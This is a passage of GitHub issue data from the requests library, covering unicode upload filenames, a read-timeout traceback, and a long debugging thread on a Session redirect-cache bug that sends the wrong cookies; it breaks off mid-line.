{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2411/reactions" }
https://api.github.com/repos/psf/requests/issues/2411/timeline
null
completed
null
null
false
[ "In fact, I have not tried this yet, but I think it will make writing code compatible with Python 2 and Python 3 much more difficult. In working around the Python 2 issue by encoding the unicode filename, it is likely that a Python 3 issue will be introduced. This is going to require version specific encoding handling to ensure a unicode filename under Python 3 and a non-unicode filename under Python 2.\n", "@sjagoe I have a question: if you provide us a unicode filename, what encoding should we render that with when transmitting that over the wire?\n", "@Lukasa Admittedly, that is an issue. There is no way for you to know. I guess in the past is just encoded to `ascii`?\n\nIn which case, this issue is still two things: \n- v2.5.1 broke compatibility with v2.5.0.\n- I have just verified that under Python 3, if the filename _is_ encoded beforehand, then the original issue I reported under Python 2 rears its head. That is, requests does not send the filename and my server sees the filename simply as `'file'`, instead of the original.\n\nEDIT: To clarify, under Python 3, a Unicode filename is _required_ (any encoded filename, e.g. `ascii`, `utf-8`, etc, is not sent to the server) and under Python 2, and encoded filename is _required_.\n", "Agreed.\n\nWhat we need, I think, is for `guess_filename` to check on `basestring` and then call `to_native_str`.\n", "I would even be okay with it if a unicode filename was rejected outright with an exception, requiring the user to explicitly encode, but I don't know what the policy of requests is wrt user-annoying strictness ;-)\n", "Of course, in the interest of compatibility, using `to_native_str` for any 2.5.x fixes would be the best way forward in any case.\n", "So the reality is that we need to unbreak this until 3.0 at which point we can redefine the requests interface for this. I have an idea for a solution and am working on a pull request.\n", "I'm seeing this issue now in 2.6.0 with the following code:\n\n``` python\nurl = 'https://slack.com/api/files.upload'\nwith open('File β.txt', 'rb') as file:\n r = requests.post(url, files={'file': file}, params={\n 'token': api_token,\n 'channels': channel\n })\n```\n\nI get a response that no data was found. I'm using Python 3.\n", "@abbeycode Can you run the following snippet for me please?\n\n``` python\nfrom requests.utils import guess_filename\n\nwith open('File β.txt', 'rb') as file:\n print guess_filename(file)\n print type(guess_filename(file))\n\n```\n", "Luckily Slack is very responsive about these sorts of things and you should kindly inform them that they're not following 10+ year old specifications and they should (namely RFC 2231). I suspect this is more of a duplicate of #2117 than this issue.\n", "Yeah, suspect you're right @sigmavirus24. Note that this is a fairly widely-deployed standard, and the HTTPBis is working on bringing it up to date in the draft for [RFC 5987bis](https://tools.ietf.org/html/draft-reschke-rfc5987bis-07), so servers and frameworks that don't support it really should.\n", "@Lukasa it seems that 5987bis is expired =( (Expires Jan 3, 2015)\n", "Work is still ongoing, WG is aiming for last call by IETF Prague.\n", "@Lukasa this is what I get:\n\n```\nFile β.txt\n<class 'str'>\n```\n", "Yup, so this means your server doesn't support the RFC that's used to automatically encode binary data. I recommend you encode the name of your file before opening it, or provide the filename yourself:\n\n``` python\nurl = 'https://slack.com/api/files.upload'\nwith open('File β.txt', 'rb') as file:\n r = requests.post(url, files={'file': ['File β.txt'.encode('utf-8'), file]}, params={\n 'token': api_token,\n 'channels': channel\n })\n```\n", "@Lukasa thanks for all the help, but I'm getting this:\n\n> TypeError: Type str doesn't support the buffer API\n\non this line:\n\n```\nif not any(ch in value for ch in '\"\\\\\\r\\n'):\n```\n\nin `urllib3/fields.py` (line 34). This seems like a Python 3 issue, perhaps?\n", "Hm. Let me look at that\n", "Oh wait, you mean from using @Lukasa's example using encode? Yeah. I think you're better bet is to annoy Slack until it works. I'll have to look into your existing problem first though.\n", "I sent Slack an email describing what's happening, so hopefully they'll respond and fix the issues. Thanks @Lukasa and @sigmavirus24 for all the help!\n" ]
https://api.github.com/repos/psf/requests/issues/2410
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2410/labels{/name}
https://api.github.com/repos/psf/requests/issues/2410/comments
https://api.github.com/repos/psf/requests/issues/2410/events
https://github.com/psf/requests/issues/2410
54,652,674
MDU6SXNzdWU1NDY1MjY3NA==
2,410
urllib3 exceptions
{ "avatar_url": "https://avatars.githubusercontent.com/u/80876?v=4", "events_url": "https://api.github.com/users/edrahn/events{/privacy}", "followers_url": "https://api.github.com/users/edrahn/followers", "following_url": "https://api.github.com/users/edrahn/following{/other_user}", "gists_url": "https://api.github.com/users/edrahn/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/edrahn", "id": 80876, "login": "edrahn", "node_id": "MDQ6VXNlcjgwODc2", "organizations_url": "https://api.github.com/users/edrahn/orgs", "received_events_url": "https://api.github.com/users/edrahn/received_events", "repos_url": "https://api.github.com/users/edrahn/repos", "site_admin": false, "starred_url": "https://api.github.com/users/edrahn/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/edrahn/subscriptions", "type": "User", "url": "https://api.github.com/users/edrahn", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-17T06:26:33Z
2021-09-08T23:06:11Z
2015-01-17T14:42:51Z
NONE
resolved
Traceback (most recent call last): File "./dlcharts.py", line 111, in <module> content = get_url(url) File "/home/ed/projects/equalog/src/web.py", line 118, in get_url referrer=referrer) File "/home/ed/projects/equalog/src/web.py", line 81, in get_content content = response.content File "/usr/lib/python2.7/dist-packages/requests/models.py", line 694, in content self._content = bytes().join(self.iter_content(CONTENT_CHUNK_SIZE)) or bytes() File "/usr/lib/python2.7/dist-packages/requests/models.py", line 627, in generate for chunk in self.raw.stream(chunk_size, decode_content=True): File "/usr/lib/python2.7/dist-packages/urllib3/response.py", line 242, in stream data = self.read(amt=amt, decode_content=decode_content) File "/usr/lib/python2.7/dist-packages/urllib3/response.py", line 200, in read raise ReadTimeoutError(self._pool, None, 'Read timed out.') urllib3.exceptions.ReadTimeoutError: HTTPConnectionPool(host='....', port=80): Read timed out.
{ "avatar_url": "https://avatars.githubusercontent.com/u/80876?v=4", "events_url": "https://api.github.com/users/edrahn/events{/privacy}", "followers_url": "https://api.github.com/users/edrahn/followers", "following_url": "https://api.github.com/users/edrahn/following{/other_user}", "gists_url": "https://api.github.com/users/edrahn/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/edrahn", "id": 80876, "login": "edrahn", "node_id": "MDQ6VXNlcjgwODc2", "organizations_url": "https://api.github.com/users/edrahn/orgs", "received_events_url": "https://api.github.com/users/edrahn/received_events", "repos_url": "https://api.github.com/users/edrahn/repos", "site_admin": false, "starred_url": "https://api.github.com/users/edrahn/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/edrahn/subscriptions", "type": "User", "url": "https://api.github.com/users/edrahn", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2410/reactions" }
https://api.github.com/repos/psf/requests/issues/2410/timeline
null
completed
null
null
false
[ "What version of requests are you using? This should have been patched in 2.4.0.\n", "I'm not sure what version it was. I was using the system package instead of my virtaulenv one, and that fixed it. Most likey diferent versions.\n" ]
https://api.github.com/repos/psf/requests/issues/2409
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2409/labels{/name}
https://api.github.com/repos/psf/requests/issues/2409/comments
https://api.github.com/repos/psf/requests/issues/2409/events
https://github.com/psf/requests/issues/2409
54,500,918
MDU6SXNzdWU1NDUwMDkxOA==
2,409
Consecutive requests with Session() raises 404
{ "avatar_url": "https://avatars.githubusercontent.com/u/1877650?v=4", "events_url": "https://api.github.com/users/RossLote/events{/privacy}", "followers_url": "https://api.github.com/users/RossLote/followers", "following_url": "https://api.github.com/users/RossLote/following{/other_user}", "gists_url": "https://api.github.com/users/RossLote/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/RossLote", "id": 1877650, "login": "RossLote", "node_id": "MDQ6VXNlcjE4Nzc2NTA=", "organizations_url": "https://api.github.com/users/RossLote/orgs", "received_events_url": "https://api.github.com/users/RossLote/received_events", "repos_url": "https://api.github.com/users/RossLote/repos", "site_admin": false, "starred_url": "https://api.github.com/users/RossLote/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/RossLote/subscriptions", "type": "User", "url": "https://api.github.com/users/RossLote", "user_view_type": "public" }
[]
closed
true
null
[]
null
42
2015-01-15T20:38:19Z
2021-09-08T01:21:19Z
2018-06-19T18:23:11Z
NONE
resolved
In [1]: import requests In [2]: s = requests.Session() In [3]: s.get('https://www.flavourly.com/start-subscription/12/', verify=False) Out[3]: &lt;Response [200]&gt; In [4]: s.get('https://www.flavourly.com/start-subscription/12/', verify=False) Out[4]: &lt;Response [404]&gt; Is it me or is this a bug? I've checked and it only happens in versions higher than 2.3.0.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2409/reactions" }
https://api.github.com/repos/psf/requests/issues/2409/timeline
null
completed
null
null
false
[ "I don't think it's a bug, I think it's because of cookies. Flavourly doesn't seem to like the cookies we're sending back. Try checking the difference between the value of `s.cookies` after the first request, once in something where you don't see the 'bug', and once in a version where you do.\n", "In fact, I think the bug is on Flavourly's end, because the history is this:\n\n``` python\n>>> import requests\n>>> s = requests.Session()\n>>> r1 = s.get('https://www.flavourly.com/start-subscription/12/')\n>>> r1.history\n[<Response [302]>, <Response [301]>]\n>>> for r in r1.history:\n... print r.url\n... \nhttps://www.flavourly.com/start-subscription/12/\nhttp://www.flavourly.com/signup/\n>>> print r.url\nhttp://www.flavourly.com/signup/\n```\n", "But the second time around, they 404 on the signup URL:\n\n``` python\n>>> r2 = s.get('https://www.flavourly.com/start-subscription/12/')\n>>> for r in r2.history:\n... print r.url\n... \nhttps://www.flavourly.com/start-subscription/12/\n>>> print r2.url\nhttps://www.flavourly.com/signup/\n```\n", "Oh, hey, look! For the second time my predictions about #2095 have come true and it's caused us problems:\n\n```\nimport requests\n>>> s = requests.Session()\n>>> class NullDict(dict):\n... def __setitem__(self, key, value):\n... return\n... \n>>> s.redirect_cache = NullDict()\n>>> s.get('https://www.flavourly.com/start-subscription/12/')\n<Response [200]>\n>>> s.get('https://www.flavourly.com/start-subscription/12/')\n<Response [200]>\n```\n", "So I retract my position, this is an interaction of a requests behaviour and a Flavourly behaviour. They 301 from http to https, which we cache. We're allowed to do that, that's what 301 means, as you can see [from the spec](https://tools.ietf.org/html/rfc7231#section-6.4.2):\n\n> The 301 (Moved Permanently) status code indicates that the target resource has been assigned a new permanent URI and any future references to this resource ought to use one of the enclosed URIs. Clients with link-editing capabilities ought to automatically re-link references to the effective request URI to one or more of the new references sent by the server, where possible.\n\nHowever, that seems to fall over with this particular redirect. That's weird because the 301 doesn't actually set any cookies or anything, and we don't send it any cookies either (because they stored their cookie as 'secure').\n", "Ok, the problem is cookie handling. This request came from one with the redirect cache turned off:\n\n``` python\n>>> r.request.headers['Cookie']\n'csrftoken=83Tg47VB3OtXBLsIQa3PZg5NEJFH5dhT; sessionid=j59ad65zb2lzfviux37kwxqjipytqthr'\n```\n\nAnd this one from one with the redirect cache turned on:\n\n``` python\n>>> r2.request.headers['Cookie']\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/usr/local/lib/python2.7/site-packages/requests/structures.py\", line 54, in __getitem__\n return self._store[key.lower()][1]\nKeyError: 'cookie'\n```\n\nHere are the two session cookiejars:\n\n``` python\n>>> s.cookies\n<RequestsCookieJar[Cookie(version=0, name='csrftoken', value='83Tg47VB3OtXBLsIQa3PZg5NEJFH5dhT', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1452805132, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), Cookie(version=0, name='sessionid', value='j59ad65zb2lzfviux37kwxqjipytqthr', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1422565132, discard=False, comment=None, comment_url=None, rest={'httponly': None}, rfc2109=False)]>\n>>> s2.cookies\n<RequestsCookieJar[Cookie(version=0, name='csrftoken', value='Pja7YWnMlcw4qtrvvf2I6BbeuV3S6iGX', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1452805188, discard=False, comment=None, comment_url=None, rest={}, rfc2109=False), Cookie(version=0, name='sessionid', value='222eih12j1h8wr3c3n93pvza8hkg736e', port=None, port_specified=False, domain='www.flavourly.com', domain_specified=False, domain_initial_dot=False, path='/', path_specified=True, secure=True, expires=1422565189, discard=False, comment=None, comment_url=None, rest={'httponly': None}, rfc2109=False)]>\n```\n", "Ugh, FFS, I've found it.\n\nThe problem is that we handle the redirect cache in `Session.send` with this logic:\n\n``` python\n checked_urls = set()\n while request.url in self.redirect_cache:\n checked_urls.add(request.url)\n new_url = self.redirect_cache.get(request.url)\n if new_url in checked_urls:\n break\n request.url = new_url\n```\n\nHowever, this is well _after_ we've decided what the cookies should be (in `Session.prepare_request`). This means that the cookies are chosen based on the original URL, but the actual URL hit is potentially redirected dramatically.\n\nThis is a definite bug introduced by #2095. Apologies for my earlier comment @RossLote, you're quite right that this is a bug.\n", "@RossLote Until this gets fixed, feel free to use the workaround I posted above. It has no negative side-effects aside from occasionally slightly slowing your code down.\n", "Alright, @sigmavirus24, I've thought about this overnight and I can't think of a good fix that uses the current code and doesn't commit wild layering violations. So here's my proposal.\n\nWe should rewrite the redirect cache.\n\nThe core problem is, fundamentally, that the redirect cache's implementation is misguided. I've come to this position because of closer reading of RFC 7231. It has the following two stanzas [under the 301 code](https://tools.ietf.org/html/rfc7231#section-6.4.2) that I find to be interesting:\n\n> [A]ny future references to this resource ought to use one of the enclosed URIs. Clients with link-editing capabilities ought to automatically re-link references to the effective request URI to one or more of the new references sent by the server, where possible\n\nand\n\n> A 301 response is cacheable by default; i.e., unless otherwise indicated by the method definition or explicit cache controls.\n\nThis is a weird combination of text. If the 301 is supposed to cause a rewrite of the URL, why would I cache it?\n\nMy suspicion is that the correct flow in requests is actually not a 'redirect' cache, but a 301 cache, that literally returns 301 responses without contacting the network. This will lead to the correct flow in requests: everything looks exactly the same from the perspective of the upper layers of code, the response just came in really fast.\n\nThis is backed up by examining what Chrome does, which is serve 301s from its cache (click to see better):\n\n![301](https://cloud.githubusercontent.com/assets/1382556/5773563/dc5f2bdc-9d5b-11e4-8581-5f83e76d8526.png)\n\nI think now, as I thought then, that the 301 cache should not have been merged in its proposed form. I now think more strongly than that: we have to change it. I have three options on the table:\n1. Remove the redirect cache entirely. People who want that function should use [CacheControl](https://github.com/ionrock/cachecontrol), as we have said many, many times. This will lead to the flow through requests I mentioned above, resolve this bug (and some others that are inevitably lying around), and provide additional benefits _on top_ of the standard redirect cache.\n2. Replace the redirect cache with a special-case cache for 301s that operates at the `HTTPAdapter` layer. This is tricky, because caching 301s needs to obey all the rules for caching (another thing our 'redirect cache' doesn't do), including `Cache-Control` and `Vary` headers. We'd probably need to write about 30% of the CacheControl library, which raises my third option;\n3. Bring CacheControl (or someone else) into the fold. Bless a requests caching solution as 'the one true way' to cache and bring it in tree, or use it as an external `pip` dependency, but include it by default. This will fix our 301 bugs and give us caching out-of-the-box by default.\n\nThoughts would be extremely appreciated at this time. Especially from @sigmavirus24, @kennethreitz, @shazow, @ionrock. Note also the discussion that occurred in #2095: my reading of it suggests that @johnsheehan, @dstufft, and @dknecht favoured my option 1, and @dolph favoured something closer to my option 3 (or possibly 2).\n", "Option 1 and 3 seem the most reasonable to me. I agree with your reading of the spec. The redirect cache is really an operation that is implicitly dependent on the client having some caching implementation including both storage and the HTTP algorithms. Unfortunately, as I have a feeling that I assumed requests was responsible for it, I don't have support for caching 301s in CacheControl. That should obviously change before recommending CacheControl handle this aspect. \n\nAlso, to specifically address option 3, I'm fine to merge or include CacheControl as a dependency. I'm happy to support the code no matter the decision there. Between to the two, I suspect that adding a dependency would be the better option, but in terms my stamp of approval, I'd support either option. Obviously, no big deal if option 3 doesn't happen either. In other words, I'm easy to please! :)\n", "I'm in favor of option 1. If there's a bunch of complexity to setting up CacheControl to handle this case (which is @Ionrock's prerogative) we can put the common code in requests-toolbelt as necessary. I'm fine having a dependency in there on CacheControl. If we do choose option 3, I'd much rather see CacheControl as an outside dependency. Development on that moves quickly enough that it makes sense to allow people to upgrade as necessary rather than bundling it.\n\nFrankly, I'm worried about removing the redirect cache haphazardly though. Perhaps the best first option would be to use a `NullCache` for v2.6.0 of requests. This means people will have to specifically turn it on for it to work (and thereby cause issues). We would document how to use `urllib3`'s `RecentlyUsedContainer`. I suspect the problem we'll have is with pickling again. We can serialize a `NullCache` as a special sentinel value. Then we'll have to change https://github.com/kennethreitz/requests/blob/d2d576b6b1101e2871c82f63adf2c2b534c2dabc/requests/sessions.py#L674 to check the popped value and determine if it's the sentinel. If it isn't, we'll use a `RecentlyUsedContainer`.\n\nIt's extra work but it will provide a level of backwards compatibility until we can break this out in 3.0. In documenting how to enable this, we should add the warning that it is a slipshod implementation of the cache that has been known to cause problems. It should also be noted that it is considered deprecated functionality and will be removed in 3.0. When it's available in CacheControl, we should then start pointing towards that as a real solution that is correct and more reliable than using the redirect cache.\n\nHow does this sound to everyone?\n", "I've updated CacheControl to support 301 and 300 status codes. 300s are dealt with, more or less, like a normal response, where 301s are cached by default, while adhering to caching headers. \n\nI looked into the other 3xx headers and it seems the spec specifically provides guidance regarding caching by mentioning it specifically in its description. If others have different perspectives let me know. \n\nIf folks want to test it out to verify it fufills the same results as the existing redirect cache, just checkout master and give it a try. Let me know if you find any issues. \n", "I'm having a similar problem as the original report here. In my case the subsequent requests are returning a 400 rather than 404.\n\n```\n$ python\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> auth\n('xxxxx', 'xxxxxx')\n>>> s = requests.session()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [400]>\n```\n\nSubsequent requests are OK when not using a session:\n\n```\n>>> r = requests.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r = requests.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>>\n```\n\nAnd it works OK when using a session without the auth:\n\n```\n>>> s = requests.Session()\n>>> r = s.get(url=url+\"/changes/\")\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/changes/\")\n>>> r\n<Response [200]>\n>>>\n```\n\nI've tried the `NullDict` workaround mentioned above, but that didn't make any difference.\n", "@dpursehouse What's in the response history for each response?\n", "@Lukasa the history seems to be empty for both responses\n\n```\n>>> s = requests.Session()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r.history\n[]\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [400]>\n>>> r.history\n[]\n>>> \n```\n", "I've also tried using the latest head of the master branch (previously using the released 2.7.0) and get the same results.\n", "@dpursehouse That strongly suggests one of two things:\n1. The connection is setting a cookie that it then does not expect to receive back. Unlikely.\n2. The remote server doesn't like connection reuse. _Way_ more likely. Particularly if it's behind HAProxy, which can get all kinds of sad here.\n\nCan you try mounting a HTTPAdapter with a poolsize of 1?\n\n``` python\nfrom requests.adapters import HTTPAdapter\nimport requests\n\nh = HTTPAdapter(pool_connections=1, pool_maxsize=1)\ns = requests.Session()\ns.mount('https://gerrit-review.googlesource.com', h)\n\n# Make your requests here\n```\n", "Same result :(\n\n```\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth)\n>>> r\n<Response [400]>\n>>> \n```\n", "Ah, crap, sorry, change the 1s to 0s. Sometimes I forget how to urllib3. =D\n", "After changing them to 0 I get this exception on the `get` call:\n\n```\nrequests.packages.urllib3.exceptions.ClosedPoolError: HTTPSConnectionPool(host='gerrit-review.googlesource.com', port=443): Pool is closed.\n```\n", "BTW in case it's relevant, on the call to `get` that succeeds, it emits this:\n\n```\nENV/local/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n```\n\nThe subsequent failing one does not.\n\nI omitted that from my previous logs because I was too lazy to edit out only the sensitive parts of my path and just removed the whole line.\n", "That's to be expected: we only emit the InsecurePlatformWarning once.\n\nOk, new plan: can we do this instead?\n\n``` python\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n```\n\nHere we're trying not to consume the response, which should ensure the pool is empty and you get a new connection.\n", "This time it emits the `InsecurePlatformWarning` on both requests, but the second request still returns 400.\n\n```\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [200]>\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [400]>\n>>>\n```\n", "Interesting. That suggests a cookie problem. Can you print `r.request.headers` for me in both cases?\n", "Looks like there's a cookie in the second one that wasn't in the first. Note that I've redacted the value of the cookie and the auth headers :)\n\n```\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [200]>\n>>> r.request.headers\n{'Accept': '*/*', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Authorization': 'Basic xxxx', 'User-Agent': 'python-requests/2.7.0 CPython/2.7.6 Darwin/14.1.0'}\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [400]>\n>>> r.request.headers\n{'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.7.0 CPython/2.7.6 Darwin/14.1.0', 'Connection': 'keep-alive', 'Cookie': 'gi=xxxx', 'Authorization': 'Basic xxxx'}\n>>>\n```\n", "So that cookie appears to be the core problem. Can you confirm that the header was correctly set? `r.headers['set-cookie']` will work. Can you obfuscate the value and then show me the rest?\n", "The `set-cookie` header is present on the response from the first request, but not on the second.\n\n```\n>>> import requests\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> from requests.adapters import HTTPAdapter\n>>> h = HTTPAdapter(pool_connections=1, pool_maxsize=1)\n>>> s = requests.Session()\n>>> s.mount('https://gerrit-review.googlesource.com', h)\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [200]>\n>>> r.headers['set-cookie']\n'gi=xxx;Path=/;Secure;HttpOnly'\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> r\n<Response [400]>\n>>> r.headers['set-cookie']\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\n File \"/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/structures.py\", line 54, in __getitem__\n return self._store[key.lower()][1]\nKeyError: 'set-cookie'\n>>>\n```\n", "That's bizarre. Why does the service not like the cookie that it itself sets?\n\nLet's just confirm that this is actually what's happening. Can you run this?\n\n``` python\nimport requests\nfrom requests.cookies import RequestsCookieJar\nurl = \"https://gerrit-review.googlesource.com\"\nauth = requests.utils.get_netrc_auth(url)\ns = requests.Session()\nr = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\nprint r.status\ns.cookies = RequestsCookieJar()\nr = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\nprint r.status\n```\n", "Had to change `r.status` to `r.status_code`, but it seems to work now. Yay!\n\n```\n$ python\nPython 2.7.6 (default, Sep 9 2014, 15:04:36)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.39)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> from requests.cookies import RequestsCookieJar\n>>> url = \"https://gerrit-review.googlesource.com\"\n>>> auth = requests.utils.get_netrc_auth(url)\n>>> s = requests.Session()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> print r.status_code\n200\n>>> s.cookies = RequestsCookieJar()\n>>> r = s.get(url=url+\"/a/changes/\", auth=auth, stream=True)\n/Users/david/git/pygerrit/ENV/lib/python2.7/site-packages/requests/packages/urllib3/util/ssl_.py:90: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. For more information, see https://urllib3.readthedocs.org/en/latest/security.html#insecureplatformwarning.\n InsecurePlatformWarning\n>>> print 